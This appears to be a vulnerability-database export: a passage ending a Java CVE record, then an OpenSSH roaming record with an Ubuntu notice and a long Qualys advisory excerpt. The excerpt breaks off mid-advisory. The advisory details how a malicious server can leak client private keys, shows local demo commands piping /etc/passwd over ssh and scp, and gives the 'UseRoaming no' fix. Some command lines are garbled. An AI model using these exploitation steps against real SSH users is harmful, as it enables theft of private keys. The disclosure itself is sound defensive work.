"http://www-01.ibm.com/support/docview.wss?uid=swg1iv53964" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21663427" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100176223" }, { "trust": 0.3, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10058" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21667825" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv52145" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21662535" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670264" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21661213" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21664002" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672567" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671933" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659892" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660143" }, { "trust": 0.3, "url": "www-01.ibm.com/support/docview.wss?uid=swg21660145" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660149" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660456" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21659757" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21662428" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21642336" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21656459" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21660039" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_security_vulnerabilities_for_ibm_java_on_aix?lang=en_us" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672822" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21664098" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21655990" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas38fe73318db4e6c8786257c32007ee70b" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas3be721f674cf321ba86257c32007ee712" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21662315" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21668578" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24036927" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677352" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0002.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21665604" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5787" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5812" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5801" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5789" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5776" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5800.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5800" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-5838.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-4002.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5372" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5457" }, { "trust": 0.2, "url": "http://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5375" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5832.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5372.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5801.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5818.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5824.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5789.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5812.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5831.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5818" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5776.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5848.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4041" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5819.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5375.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-4041.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5819" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5787.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5843.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-5457.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5838" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2013-5780" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2033-1/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=31270" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5803" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5814" }, { "trust": 0.1, "url": "http://advisories.mageia.org/mgasa-2013-0323.html" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5823" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5802" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5797" }, { "trust": 0.1, "url": "http://blog.fuseyism.com/index.php/2013/09/07/icedtea-1-11-13-released/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5849" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5778" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5842" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5774" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5817" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5780" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5830" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5840" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3829" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5784" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5809" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5804" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5850" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5829" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5782" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4002" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5820" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5825" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5772" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5783" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5790" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5824" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1222" }, { "trust": 0.1, "url": "https://www.oracle.com/technetwork/java/javase/releasenotes-136954.html" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5788.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5458.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5788" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5456.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5456" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5458" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b27-1.12.6-1ubuntu0.10.04.4" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5851" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b27-1.12.6-1ubuntu0.12.04.4" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-5780" }, { "db": "BID", "id": "63115" }, { "db": "PACKETSTORM", "id": "124303" }, { "db": "PACKETSTORM", "id": "124071" }, { "db": "PACKETSTORM", "id": "123649" }, { "db": "PACKETSTORM", "id": "123941" }, { "db": "PACKETSTORM", "id": "123921" }, { "db": "PACKETSTORM", "id": "123689" }, { "db": "PACKETSTORM", "id": "124143" }, { "db": "PACKETSTORM", "id": "123722" }, { "db": "CNNVD", "id": "CNNVD-201310-360" }, { "db": "NVD", "id": "CVE-2013-5780" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2013-5780" }, { "db": "BID", "id": "63115" }, { "db": "PACKETSTORM", "id": "124303" }, { "db": "PACKETSTORM", "id": "124071" }, { "db": "PACKETSTORM", "id": "123649" }, { "db": "PACKETSTORM", "id": "123941" }, { "db": "PACKETSTORM", "id": "123921" }, { "db": "PACKETSTORM", "id": "123689" }, { "db": "PACKETSTORM", "id": "124143" }, { "db": "PACKETSTORM", "id": "123722" }, { "db": "CNNVD", "id": "CNNVD-201310-360" }, { "db": "NVD", "id": "CVE-2013-5780" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-10-16T00:00:00", "db": "VULMON", "id": "CVE-2013-5780" }, { "date": "2013-10-15T00:00:00", "db": "BID", "id": "63115" }, { "date": "2013-12-06T01:03:48", "db": "PACKETSTORM", "id": "124303" }, { "date": "2013-11-19T15:55:00", "db": "PACKETSTORM", "id": "124071" }, { "date": "2013-10-17T21:22:25", "db": "PACKETSTORM", "id": "123649" }, { "date": "2013-11-07T13:33:00", "db": "PACKETSTORM", "id": "123941" }, { "date": "2013-11-05T23:55:00", "db": "PACKETSTORM", "id": "123921" }, { "date": "2013-10-21T19:09:54", "db": "PACKETSTORM", "id": "123689" }, { "date": "2013-11-22T02:10:22", "db": "PACKETSTORM", "id": "124143" }, { "date": "2013-10-22T23:53:44", "db": "PACKETSTORM", "id": "123722" }, { "date": "2013-10-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201310-360" }, { "date": "2013-10-16T15:55:34.443000", "db": "NVD", "id": "CVE-2013-5780" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-01-05T00:00:00", "db": "VULMON", "id": "CVE-2013-5780" }, { "date": "2017-08-22T14:12:00", "db": "BID", "id": "63115" }, { "date": "2022-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201310-360" }, { "date": "2022-05-13T14:57:17.940000", "db": "NVD", "id": "CVE-2013-5780" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "123921" }, { "db": "PACKETSTORM", "id": "123689" }, { "db": "PACKETSTORM", "id": "123722" }, { "db": "CNNVD", "id": "CNNVD-201310-360" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle Java SE/JRockit/Java SE Embedded Libraries Component security vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201310-360" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "lack of information", "sources": [ { "db": "CNNVD", "id": "CNNVD-201310-360" } ], "trust": 0.6 } }
var-201601-0030
Vulnerability from variot
The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. In addition, JVNVU#95595627 Then CWE-122 It is published as CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.htmlA large amount of transfer is requested by the remote server, resulting in a denial of service ( Heap-based buffer overflow ) It can be unspecified, such as being put into a state. OpenSSH is prone to a heap-based buffer-overflow vulnerability. Successful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. ============================================================================ Ubuntu Security Notice USN-2869-1 January 14, 2016
openssh vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
OpenSSH could be made to expose sensitive information over the network.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: openssh-client 1:6.9p1-2ubuntu0.1
Ubuntu 15.04: openssh-client 1:6.7p1-5ubuntu1.4
Ubuntu 14.04 LTS: openssh-client 1:6.6p1-2ubuntu2.4
Ubuntu 12.04 LTS: openssh-client 1:5.9p1-5ubuntu1.8
In general, a standard system update will make all the necessary changes. Qualys Security Advisory
Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778
======================================================================== Contents ========================================================================
Summary Information Leak (CVE-2016-0777) - Analysis - Private Key Disclosure - Mitigating Factors - Examples Buffer Overflow (CVE-2016-0778) - Analysis - Mitigating Factors - File Descriptor Leak Acknowledgments Proof Of Concept
======================================================================== Summary ========================================================================
Since version 5.4 (released on March 8, 2010), the OpenSSH client supports an undocumented feature called roaming: if the connection to an SSH server breaks unexpectedly, and if the server supports roaming as well, the client is able to reconnect to the server and resume the suspended SSH session. This information leak may have already been exploited in the wild by sophisticated attackers, and high-profile sites or users may need to regenerate their SSH keys accordingly.
The buffer overflow, on the other hand, is present in the default configuration of the OpenSSH client but its exploitation requires two non-default options: a ProxyCommand, and either ForwardAgent (-A) or ForwardX11 (-X). This buffer overflow is therefore unlikely to have any real-world impact, but provides a particularly interesting case study.
All OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be easily hot-fixed by setting the undocumented option "UseRoaming" to "no", as detailed in the Mitigating Factors section. OpenSSH version 7.1p2 (released on January 14, 2016) disables roaming by default.
======================================================================== Information Leak (CVE-2016-0777) ========================================================================
Analysis
If the OpenSSH client connects to an SSH server that offers the key exchange algorithm "resume@appgate.com", it sends the global request "roaming@appgate.com" to the server, after successful authentication. If this request is accepted, the client allocates a roaming buffer out_buf, by calling malloc() (and not calloc()) with an out_buf_size that is arbitrarily chosen by the server:
63 void 64 roaming_reply(int type, u_int32_t seq, void *ctxt) 65 { 66 if (type == SSH2_MSG_REQUEST_FAILURE) { 67 logit("Server denied roaming"); 68 return; 69 } 70 verbose("Roaming enabled"); .. 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size()); .. 77 }
40 static size_t out_buf_size = 0; 41 static char out_buf = NULL; 42 static size_t out_start; 43 static size_t out_last; .. 75 void 76 set_out_buffer_size(size_t size) 77 { 78 if (size == 0 || size > MAX_ROAMBUF) 79 fatal("%s: bad buffer size %lu", func, (u_long)size); 80 / 81 * The buffer size can only be set once and the buffer will live 82 * as long as the session lives. 83 */ 84 if (out_buf == NULL) { 85 out_buf_size = size; 86 out_buf = xmalloc(size); 87 out_start = 0; 88 out_last = 0; 89 } 90 }
The OpenSSH client's roaming_write() function, a simple wrapper around write(), calls wait_for_roaming_reconnect() to transparently reconnect to the SSH server after a disconnection. It also calls buf_append() to copy the data sent to the server into the roaming buffer out_buf. During a reconnection, the client is therefore able to resend the data that was not received by the server because of the disconnection:
198 void 199 resend_bytes(int fd, u_int64_t offset) 200 { 201 size_t available, needed; 202 203 if (out_start < out_last) 204 available = out_last - out_start; 205 else 206 available = out_buf_size; 207 needed = write_bytes - offset; 208 debug3("resend_bytes: resend %lu bytes from %llu", 209 (unsigned long)needed, (unsigned long long)*offset); 210 if (needed > available) 211 fatal("Needed to resend more data than in the cache"); 212 if (out_last < needed) { 213 int chunkend = needed - out_last; 214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend, 215 chunkend); 216 atomicio(vwrite, fd, out_buf, out_last); 217 } else { 218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed); 219 } 220 }
In the OpenSSH client's roaming buffer out_buf, the most recent data sent to the server begins at index out_start and ends at index out_last. As soon as this circular buffer is full, buf_append() maintains the invariant "out_start = out_last + 1", and consequently three different cases have to be considered:
-
"out_start < out_last" (lines 203-204): out_buf is not full yet (and out_start is still equal to 0), and the amount of data available in out_buf is indeed "out_last - out_start";
-
"out_start > out_last" (lines 205-206): out_buf is full (and out_start is exactly equal to "out_last + 1"), and the amount of data available in out_buf is indeed the entire out_buf_size;
-
"out_start == out_last" (lines 205-206): no data was ever written to out_buf (and both out_start and out_last are still equal to 0) because no data was ever sent to the server after roaming_reply() was called, but the client sends (leaks) the entire uninitialized out_buf to the server (line 214), as if out_buf_size bytes of data were available.
In order to successfully exploit this information leak and retrieve sensitive information from the OpenSSH client's memory (for example, private SSH keys, or memory addresses useful for further exploitation), a malicious server needs to:
-
Massage the client's heap before roaming_reply() malloc()ates out_buf, and force malloc() to return a previously free()d but uncleansed chunk of sensitive information. The simple proof-of-concept in this advisory does not implement heap massaging.
-
Guess the client's get_snd_buf_size() in order to precisely control out_buf_size. OpenSSH < 6.0 accepts out_buf sizes in the range (0,4G), and OpenSSH >= 6.0 accepts sizes in the range (0,2M]. Sizes smaller than get_snd_buf_size() are attainable because roaming_reply() does not protect "packet_get_int() + get_snd_buf_size()" against integer wraparound. The proof-of-concept in this advisory attempts to derive the client's get_snd_buf_size() from the get_recv_buf_size() sent by the client to the server, and simply chooses a random out_buf_size.
-
Advise the client's resend_bytes() that all "available" bytes (the entire out_buf_size) are "needed" by the server, even if fewer bytes were actually written by the client to the server (because the server controls the "offset" argument, and resend_bytes() does not protect "needed = write_bytes - offset" against integer wraparound).
Finally, a brief digression on a minor bug in resend_bytes(): on 64-bit systems, where "chunkend" is a 32-bit signed integer, but "out_buf" and "out_buf_size" are 64-bit variables, "out_buf + out_buf_size - chunkend" may point out-of-bounds, if chunkend is negative (if out_buf_size is in the [2G,4G) range). This negative chunkend is then converted to a 64-bit size_t greater than SSIZE_MAX when passed to atomicio(), and eventually returns EFAULT when passed to write() (at least on Linux and OpenBSD), thus avoiding an out-of-bounds read from the OpenSSH client's memory.
Private Key Disclosure
We initially believed that this information leak in the OpenSSH client's roaming code would not allow a malicious SSH server to steal the client's private keys, because:
-
the information leaked is not read from out-of-bounds memory, but from a previously free()d chunk of memory that is recycled to malloc()ate the client's roaming buffer out_buf;
-
private keys are loaded from disk into memory and freed by key_free() (old API, OpenSSH < 6.7) or sshkey_free() (new API, OpenSSH >= 6.7), and both functions properly cleanse the private keys' memory with OPENSSL_cleanse() or explicit_bzero();
-
temporary copies of in-memory private keys are freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse these copies with memset() or bzero().
However, we eventually identified three reasons why, in our experiments, we were able to partially or completely retrieve the OpenSSH client's private keys through this information leak (depending on the client's version, compiler, operating system, heap layout, and private keys):
(besides these three reasons, other reasons may exist, as suggested by the CentOS and Fedora examples at the end of this section)
-
If a private SSH key is loaded from disk into memory by fopen() (or fdopen()), fgets(), and fclose(), a partial or complete copy of this private key may remain uncleansed in memory. Indeed, these functions manage their own internal buffers, and whether these buffers are cleansed or not depends on the OpenSSH client's libc (stdio) implementation, but not on OpenSSH itself.
-
In all vulnerable OpenSSH versions, SSH's main() function calls load_public_identity_files(), which loads the client's public keys with fopen(), fgets(), and fclose(). Unfortunately, the private keys (without the ".pub" suffix) are loaded first and then discarded, but nonetheless buffered in memory by the stdio functions.
-
In OpenSSH versions <= 5.6, the load_identity_file() function (called by the client's public-key authentication method) loads a private key with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses fgets() and hence internal stdio buffering.
Internal stdio buffering is the most severe of the three problems discussed in this section, although GNU/Linux is not affected because the glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. BSD-based systems, on the other hand, are severely affected because they simply malloc()ate and free() stdio buffers. For interesting comments on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk
-
In OpenSSH versions >= 5.9, the client's load_identity_file() function (called by the public-key authentication method) read()s a private key in 1024-byte chunks that are appended to a growing buffer (a realloc()ating buffer) with buffer_append() (old API) or sshbuf_put() (new API). Unfortunately, the repeated calls to realloc() may leave partial copies of the private key uncleansed in memory.
-
In OpenSSH < 6.7 (old API), the initial size of such a growing buffer is 4096 bytes: if a private-key file is larger than 4K, a partial copy of this private key may remain uncleansed in memory (a 3K copy in a 4K buffer). Fortunately, only the file of a very large RSA key (for example, an 8192-bit RSA key) can exceed 4K.
-
In OpenSSH >= 6.7 (new API), the initial size of a growing buffer is 256 bytes: if a private-key file is larger than 1K (the size passed to read()), a partial copy of this private key may remain uncleansed in memory (a 1K copy in a 1K buffer). For example, the file of a default-sized 2048-bit RSA key exceeds 1K.
For more information on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources
https://cwe.mitre.org/data/definitions/244.html
- An OpenSSH growing-buffer that holds a private key is eventually freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse the buffer with memset() or bzero() before they call free(). Unfortunately, an optimizing compiler may remove this memset() or bzero() call, because the buffer is written to, but never again read from (an optimization known as Dead Store Elimination).
OpenSSH 6.6 is the only version that is not affected, because it calls explicit_bzero() instead of memset() or bzero().
Dead Store Elimination is the least severe of the three problems explored in this section, because older GCC versions do not remove the memset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5 and Clang/LLVM do, however, remove it. For detailed discussions of this issue:
https://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations
https://cwe.mitre.org/data/definitions/14.html
https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506
Finally, for these three reasons, passphrase-encrypted SSH keys are leaked in their encrypted form, but an attacker may attempt to crack the passphrase offline. On the other hand, SSH keys that are available only through an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the undocumented option "UseRoaming no" to the system-wide configuration file (usually /etc/ssh/ssh_config), or per-user configuration file (~/.ssh/config), or command-line (-o "UseRoaming no").
- If an OpenSSH client is disconnected from an SSH server that offers roaming, it prints "[connection suspended, press return to resume]" on stderr, and waits for '\n' or '\r' on stdin (and not on the controlling terminal) before it reconnects to the server; advanced users may become suspicious and press Control-C or Control-Z instead, thus avoiding the information leak:
"pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume]^Z [1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1
However, SSH commands that use the local stdin to transfer data to the remote server are bound to trigger this reconnection automatically (upon reading a '\n' or '\r' from stdin). Moreover, these non-interactive SSH commands (for example, backup scripts and cron jobs) commonly employ public-key authentication and are therefore perfect targets for this information leak:
$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.ls" [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.tar" tar: Removing leading `/' from member names [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] ... [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
Similarly, the SCP client uses the SSH client's stdin and stdout to transfer data, and can be forced by a malicious SSH server to output a control record that ends in '\n' (an error message in server-to-client mode, or file permissions in client-to-server mode); this '\n' is then read from stdin by the fgetc() call in wait_for_roaming_reconnect(), and triggers an automatic reconnection that allows the information leak to be exploited without user interaction:
env ROAMING="scp_mode sleep:1" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp $ [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting] lost connection
-
Although a man-in-the-middle attacker can reset the TCP connection between an OpenSSH client and an OpenSSH server (which does not support roaming), it cannot exploit the information leak without breaking server host authentication or integrity protection, because it needs to:
-
first, append the "resume@appgate.com" algorithm name to the server's initial key exchange message;
-
second, in response to the client's "roaming@appgate.com" request, change the server's reply from failure to success.
In conclusion, an attacker who wishes to exploit this information leak must convince its target OpenSSH client to connect to a malicious server (an unlikely scenario), or compromise a trusted server (a more likely scenario, for a determined attacker).
-
In the client, wait_for_roaming_reconnect() calls ssh_connect(), the same function that successfully established the first connection to the server; this function supports four different connection methods, but each method contains a bug and may fail to establish a second connection to the server:
-
In OpenSSH >= 6.5 (released on January 30, 2014), the default ssh_connect_direct() method (a simple TCP connection) is called by wait_for_roaming_reconnect() with a NULL aitop argument, which makes it impossible for the client to reconnect to the server:
418 static int 419 ssh_connect_direct(const char host, struct addrinfo aitop, ... 424 int sock = -1, attempt; 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV]; ... 430 for (attempt = 0; attempt < connection_attempts; attempt++) { ... 440 for (ai = aitop; ai; ai = ai->ai_next) { ... 470 } 471 if (sock != -1) 472 break; / Successful connection. / 473 } 474 475 / Return failure if we didn't get a successful connection. / 476 if (sock == -1) { 477 error("ssh: connect to host %s port %s: %s", 478 host, strport, strerror(errno)); 479 return (-1); 480 }
Incidentally, this error() call displays stack memory from the uninitialized strport[] array, a byproduct of the NULL aitop:
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
